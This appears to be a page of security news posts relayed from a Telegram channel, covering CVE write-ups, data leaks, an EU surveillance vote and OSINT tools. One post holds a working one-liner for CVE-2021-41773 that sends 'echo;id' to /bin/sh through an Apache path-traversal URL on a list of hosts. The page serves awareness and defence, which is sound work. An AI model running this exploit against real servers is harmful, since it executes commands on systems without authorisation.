All posts by cK-bot

■■■■■ This write-up provides an overview of CVE-2021-26084 – Confluence Server Webwork OGNL injection https://github.com/snowyyowl/writeups/blob/main/CVE-2021-26084.md https://t.me/cKure/9672

■■□□□ Privacy: The European Union Parliament has voted in favor of a resolution that bans the adoption of AI-powered biometric mass surveillance technologies such as facial recognition systems in the continent. https://t.me/cKure/9670

■■■□□ Data-Leak: An anonymous user posted a link to a 125GB torrent to 4chan yesterday, containing all of Twitch’s source code, comments going back to its inception and more. https://threatpost.com/twitch-source-code-leaked/175359/ https://t.me/cKure/9669

■■■■■ Update : CVE-2021-41773 POC as RCE. cat file | while read host do ; do curl –silent –path-as-is –data “echo;id” ‘$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’ | grep “uid” && echo “$host \033[0;31mVuln\n”|| echo “$host \033[0;32mNot\n”;done Source: Rohit https://t.me/cKure/9668

■■■■■ Threats Posed by Encrypted Office Files. https://expmon.blogspot.com/2021/10/regarding-threats-posed-by-encrypted.html https://t.me/cKure/9666

■■■■■ Claim by Anonymous hacking group: A hacker known as The ‘Notorious BGP’ successfully DOS’d Facebook for hours on October 4, affecting services for millions. https://twitter.com/YourAnonNews/status/1445353659601203202 https://t.me/cKure/9665

■■□□□ Data-Leak: The Telegraph exposes 10 TB database with subscriber info. https://www.bleepingcomputer.com/news/security/the-telegraph-exposes-10-tb-database-with-subscriber-info/ https://t.me/cKure/9664

■■■■■ 🔧 Tool: 𝚔𝚊𝚛𝚖𝚊 𝚟𝟸 is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework) https://github.com/Dheerajmadhukar/karma_v2 https://t.me/cKure/9663

● Yet another website: sitecheck.sucuri.net/ (Malware Scanner) https://t.me/cKure/9662

■■■■■ CVE-2021-41773.nse by Dhiraj (🇮🇳/🇦🇪) https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse https://t.me/cKure/9661